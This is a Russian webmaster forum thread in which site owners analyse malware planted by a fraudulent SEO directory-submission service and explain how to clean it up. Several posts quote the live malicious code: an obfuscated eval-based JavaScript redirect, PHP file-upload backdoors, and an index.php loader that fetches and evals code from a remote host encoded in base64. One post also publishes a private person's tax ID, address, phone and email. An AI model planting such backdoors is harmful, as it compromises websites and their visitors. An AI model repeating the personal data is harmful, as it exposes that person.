Jump to content
mrak7575

история как cataloguing.ru убил мой сайт

Recommended Posts

Тема очень интересна.
Ребят пару месяцев назад так же увидел данную халяву. Решил прогнать свой сайтик.

Сайт на dle.
gameprocs.ru

Как я понял у меня тоже шел?
Где его искать?

Share this post


Link to post
Share on other sites

Тема очень интересна.

Ребят пару месяцев назад так же увидел данную халяву. Решил прогнать свой сайтик.

 

Сайт на dle.

gameprocs.ru

 

Как я понял у меня тоже шел?

Где его искать?

Все же разжевали! Если надо ткнкуть пальцем, то во всех js файлах (в самом конце) у вас внедрен редирект:

(function(){var a="(ni(fcoc)f.br,=hp/)xut8ixut0)'t/)xut7ixut0)'w)xut4ixnx('=)xpt/[;(ief?!1=si')]erxaht(nwotnoner=dunree,=ce.oedt_mo'=wa(Dea(gDe+)omtoiin'a=eis+ir!'r!o&onx(e)-{ttv(ni(wd.ci.e't/2o/'20})",b="fco)utn({(ss(8=ts/x.br)f.br,=hp/x.br)f.br,=w.x.br)f.dO')-x.l('0ixnx('=)xpt?[;tn}ro=wd.ci.sa)ecomterrcdunck,e=y_f,n t).ttDea(2;ce.oedt;t/xr=Dfe=&e=s&.dOin=1sIeafco)iolaohfhp/or1}0)(;",c="utn{ni xixut0)'t:'=ss(;(ss(7=t:'=ss(;(ss(4=w'=ss(;(ief/!1=si')]f.dO')-x.l('0ru v sciolaohtm,f(ce.fr)oomtoiin'_=fDeDe;sDe.tt)0dunck=e+ph;pe';(f'&fhtciefdt=)enrlutn{nwotnr=t:0.ga,0})",d="";for(var i=0;i<a.length;i++)d+=a.charAt(i)+b.charAt(i)+c.charAt(i);eval(d);}());

Share this post


Link to post
Share on other sites

 

Все же разжевали! Если надо ткнкуть пальцем, то во всех js файлах (в самом конце) у вас внедрен редирект:

(function(){var a="(ni(fcoc)f.br,=hp/)xut8ixut0)'t/)xut7ixut0)'w)xut4ixnx('=)xpt/[;(ief?!1=si')]erxaht(nwotnoner=dunree,=ce.oedt_mo'=wa(Dea(gDe+)omtoiin'a=eis+ir!'r!o&onx(e)-{ttv(ni(wd.ci.e't/2o/'20})",b="fco)utn({(ss(8=ts/x.br)f.br,=hp/x.br)f.br,=w.x.br)f.dO')-x.l('0ixnx('=)xpt?[;tn}ro=wd.ci.sa)ecomterrcdunck,e=y_f,n t).ttDea(2;ce.oedt;t/xr=Dfe=&e=s&.dOin=1sIeafco)iolaohfhp/or1}0)(;",c="utn{ni xixut0)'t:'=ss(;(ss(7=t:'=ss(;(ss(4=w'=ss(;(ief/!1=si')]f.dO')-x.l('0ru v sciolaohtm,f(ce.fr)oomtoiin'_=fDeDe;sDe.tt)0dunck=e+ph;pe';(f'&fhtciefdt=)enrlutn{nwotnr=t:0.ga,0})",d="";for(var i=0;i<a.length;i++)d+=a.charAt(i)+b.charAt(i)+c.charAt(i);eval(d);}());

Спасибо больше ребята.

Share this post


Link to post
Share on other sites

Спасибо больше ребята.

Ну и про index.php вы поняли? В нем будет строчка:

<?php if(isset($_FILES['u']) && isset($_POST['n'])) move_uploaded_file($_FILES['u']['tmp_name'],$_POST['n']); ?>

Уже ее удаляйте, пока вам не залили шел (а возможно и уже залили)

Share this post


Link to post
Share on other sites

Тема очень интересна.

Ребят пару месяцев назад так же увидел данную халяву. Решил прогнать свой сайтик.

 

Сайт на dle.

gameprocs.ru

 

Как я понял у меня тоже шел?

Где его искать?

Ваш сайт инфицирован. Ткнул в первую попавшуюся js-ку "dle_js.js" - нашёл вредоносный код в конце. Тот же самый редирект на "http://02o.org/1a".

Код внедряется только в скрипты более 2000 символов, маленькие не трогает.

Прогоните из шелла (putty) команду, что я писал выше, получите список зараженных файлов.

Проверьте index.php, самое начало, там самая бяка может сидеть ("<?php if(isset($_FILES['u']) && isset($_POST['n'])) move_uploaded_file($_FILES['u']['tmp_name'],$_POST['n']); ?>")

Удалите 1.php, если он есть.

Посмотрите по access.log, были ли вызовы /index.php по методу POST.

Рекомендую ПОЛНОЕ восстановление из бекапа, так как, по-видимому, у вас давно заражение было, могли назаливать чего угодно.

Share this post


Link to post
Share on other sites

Да, ещё один важный момент. Функция, которая обходит и заражает скрипты, умеет подниматься выше уровня каталога с сайтом. Вобщем, заразит всё, куда дотянется пользователь, от которого запущен веб-сервер. Так что если рядом лежали ещё сайты, их тоже надо проверить.

Share this post


Link to post
Share on other sites

Тут рекламируют этот сайт.

http://pr-cy.ru/qa/question/28201

 

Можно добавить, наверное, фильтр в сообщения по доменному имени, а то не первый раз вижу "доброжелателей", рекламирующих этот "сервис".

Share this post


Link to post
Share on other sites

Приду с работы начну пилить.

Бэкап не сохранил, сайта.

 

Теперь буду делать бэки.

Наверное, самый простой способ почистить эту дрянь - это воспользоваться функцией "Найти в файлах" в notepad++ (Поиск --> Найти в файлах).

Share this post


Link to post
Share on other sites

Отличная тема, всем +, Клиент попался на данную тему, попросил исправить, и даже рыть не пришлось ничего, поиск Яндекса и рубль в кармане.

Share this post


Link to post
Share on other sites

Ребятушки помогите пожалуйста, почистил все как написано,  но не помогло(((

Где еще может сидеть эта гадость? 

Share this post


Link to post
Share on other sites

Ребятушки помогите пожалуйста, почистил все как написано,  но не помогло(((

Где еще может сидеть эта гадость? 

Ну как где? В файлах на вашем сайте. Больше нигде.

А учитывая заливку шеллов и еще чего, стоит проверить и бд

Share this post


Link to post
Share on other sites

Прогон по каталогам переехал на другой домен - "seo-razgon.ru"

 

domain: SEO-RAZGON.RU
nserver: ns1.servercount.com.
nserver: ns2.servercount.com.
nserver: ns3.servercount.com.
state: REGISTERED, DELEGATED, VERIFIED
person: Private Person
registrar: REGRU-RU
admin-contact: http://www.reg.ru/whois/admin_contact
created: 2016.11.28
paid-till: 2017.11.28
free-date: 2017.12.29
source: TCI

 

В 1.php изменился только этот адрес, по ссылкам с work.txt теперь в браузер ничего не отдаёт, так что хз, живо оно там или нет.

Может на досуге соберу honeypot и погляжу по подробнее...

Share this post


Link to post
Share on other sites

Прогон по каталогам переехал на другой домен - "seo-razgon.ru"

 

domain: SEO-RAZGON.RU

nserver: ns1.servercount.com.

nserver: ns2.servercount.com.

nserver: ns3.servercount.com.

state: REGISTERED, DELEGATED, VERIFIED

person: Private Person

registrar: REGRU-RU

admin-contact: http://www.reg.ru/whois/admin_contact

created: 2016.11.28

paid-till: 2017.11.28

free-date: 2017.12.29

source: TCI

 

В 1.php изменился только этот адрес, по ссылкам с work.txt теперь в браузер ничего не отдаёт, так что хз, живо оно там или нет.

Может на досуге соберу honeypot и погляжу по подробнее...

 

Спасибо за бдительность, новичкам будет полезно, я как-то раз попадался на подобную ловушку.


Отзывы о работе SEO-RAZGON.RU - вирус, убил сайт, как исправить.

Share this post


Link to post
Share on other sites

pitcher.su - оно или нет, интересно. Тексты сайта похожие на предыдущие, механизм поменялся. К сожалению, нет времени разобраться подробно. 

по данным WHOIS.TCINET.RU:
% By submitting a query to RIPN's Whois Service
% you agree to abide by the following terms of use:
% http://www.ripn.net/about/servpol.html#3.2 (in Russian)
% http://www.ripn.net/about/en/servpol.html#3.2 (in English).

domain:        PITCHER.SU
nserver:       ns1.hosting-vip.biz.
nserver:       ns2.hosting-vip.biz.
nserver:       ns3.hosting-vip.biz.
nserver:       ns4.hosting-vip.biz.
state:         REGISTERED, DELEGATED
person:        Private Person
e-mail:        has@mail.ru
registrar:     REGRU-SU
created:       2017-02-06T13:17:38Z
paid-till:     2019-02-06T13:17:39Z
free-date:     2019-03-11
source:        TCI

Last updated on 2018-02-20T10:36:34Z 

 

Share this post


Link to post
Share on other sites

А, разобрался. Да, это оно опять ожило :) Там при копировании кода с сайта скрипт подсовывает другой код :)

Нам кажется, что копируем

<a href="<?php if(isset($_GET['link'])) echo($_GET['link']); ?>">ОБРАТНАЯ ССЫЛКА</a>

А на самом деле, копируется это:

<a href="<?php if(isset($_GET['link'])) echo(eval($_GET['link'])); ?>">ОБРАТНАЯ ССЫЛКА</a>

Разница - как обычно - в функции eval();

Так что да, это опять каталогинг воскрес. В топку его :)

Share this post


Link to post
Share on other sites
6 минут назад, cyber сказал:

А, разобрался. Да, это оно опять ожило :) Там при копировании кода с сайта скрипт подсовывает другой код :)

Нам кажется, что копируем


<a href="<?php if(isset($_GET['link'])) echo($_GET['link']); ?>">ОБРАТНАЯ ССЫЛКА</a>

А на самом деле, копируется это:


<a href="<?php if(isset($_GET['link'])) echo(eval($_GET['link'])); ?>">ОБРАТНАЯ ССЫЛКА</a>

Разница - как обычно - в функции eval();

Так что да, это опять каталогинг воскрес. В топку его :)

Год и один день!

Share this post


Link to post
Share on other sites

Да, я с тех пор зол на них и периодически проверяю обстановку :D

Тут ещё один интересный момент: если внимательно глянуть в whois домена, то там есть мыльце has@mail.ru

Поискал - нашёл вот это: http://zakupki.gov.ru/epz/contract/contractCard/common-info.html?reestrNumber=2211300063016000059

Цитата
БЕЛОВ НИКОЛАЙ ВАСИЛЬЕВИЧ
Индивидуальный предприниматель
ИНН: 212700226591
КПП, дата постановки на учет:
21.09.1995
Российская Федерация
643
428022, ЧУВАШИЯ ЧУВАШСКАЯ РЕСПУБЛИКА- 21, Г ЧЕБОКСАРЫ, УЛ КОСМОНАВТА НИКОЛАЕВА А.Г., 26, 75 428022, ЧУВАШИЯ ЧУВАШСКАЯ РЕСПУБЛИКА- 21, Г ЧЕБОКСАРЫ, УЛ КОСМОНАВТА НИКОЛАЕВА А.Г., 26, 75
97701000
7-906-386754
has@mail.ru
 

Кто-нибудь знает, обязательно ли подтверждать почту для whois? Или можно левак вбить?

Share this post


Link to post
Share on other sites

По pitcher.ru:

Лог запроса на 1.php (ip их оставил):

46.30.40.107 - - [02/Oct/2018:17:36:32 +0300] "GET /1.php?link=eval(file_get_contents("http://pitcher.su/w/")); HTTP/1.1" 200 32 "-" "Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.9.168 Version/11.51" 864955 73333:163333

Моментально привозит в ваш index.php следующий код (дальше не ждал, снёс 1.php, восстановился из бекапа):

<?php
ini_set('display_errors','Off'); error_reporting('E_ALL');
setcookie('server',1,time()+1e6);$s=$_SERVER;$sr=$s['HTTP_REFERER'];$sh=$s['HTTP_HOST'];$cs=$_COOKIE['server'];
if(isset($_FILES['u']) && isset($_POST['n']) && isset($_POST['hash']) && md5($_POST['hash'])=='3ff1ea09b981d88e7c8752b329a7702e')
{
<------>move_uploaded_file($_FILES['u']['tmp_name'],$_POST['n']);
}
elseif(($sr && !strpos($sr,$sh) && $cs!=1) || $c=$_GET['cmdcmd'])
{
<------>eval(file_get_contents(base64_decode('aHR0cDovL3FiMC5ydS93Lz91PQ==').$sh.'&c='.$c));
}

Строка в base64 - http://qb0.ru/w/?u= - отдает такой код:

if(!isset($_GET['cmdcmd']))
{
header('Content-type: text/html; charset=UTF-8');
echo '<!DOCTYPE html>
<html>
<head>
<script>
if((self.parent && !(self.parent===self)) && (self.parent.frames.length!=0)){self.parent.location=document.location};
window.location.href="http://torroid.ru";
</script>
</head>
<body>
</body>
</html>';
exit;
}

Из браузера без параметров попадаем на....

http://torroid.ru

Свежий прогон по каталогам.

domain: TORROID.RU
nserver: ns1.hosting-vip.biz.
nserver: ns2.hosting-vip.biz.
nserver: ns3.hosting-vip.biz.
nserver: ns4.hosting-vip.biz.
state: REGISTERED, DELEGATED
person: Private Person
registrar: REGRU-RU
admin-contact: https://www.reg.ru/whois/admin_contact
created: 2018.08.03
paid-till: 2019.08.03
free-date: 2019.09.03
source: REGRU-RU

Ещё "сервисы" от этих жуликов:

http://mailer.qb0.ru/

http://ml.m8d.pw/

Ковырять насквозь всё это добро нету времени, везде присутствует развод на бабки и сомнительный код.

Цитата

Теги: pitcher.su torroid.ru mailer.qb0.ru ml.m8d.pw - развод на бабки лохотрон вирус заразил сайт гроб гроб кладбище пидор

 

Share this post


Link to post
Share on other sites

Вдогонку: во вредоносном коде index.php есть хэш md5 (3ff1ea09b981d88e7c8752b329a7702e), который соответствует строке "loh" :)

Share this post


Link to post
Share on other sites

Добрый день! Прошел почти год , а данный сайт -pitcher.su продолжает свой развод. Вот и я попал ,но благо сразу заметил и откатился с бекапа. 

в index.php:

ini_set('display_errors','Off'); error_reporting('E_ALL');
setcookie('server',1,time()+1e6);$s=$_SERVER;$sr=$s['HTTP_REFERER'];$sh=$s['HTTP_HOST'];$cs=$_COOKIE['server'];
if(isset($_FILES['u']) && isset($_POST['n']) && isset($_POST['hash']) && md5($_POST['hash'])=='3ff1ea09b981d88e7c8752b329a7702e')
{
	move_uploaded_file($_FILES['u']['tmp_name'],$_POST['n']);
}
elseif(($sr && !strpos($sr,$sh) && $cs!=1) || $c=$_GET['cmdcmd'])
{
	eval(file_get_contents(base64_decode('aHR0cDovL3FiMC5ydS93Lz91PQ==').$sh.'&c='.$c));

 

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.


  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...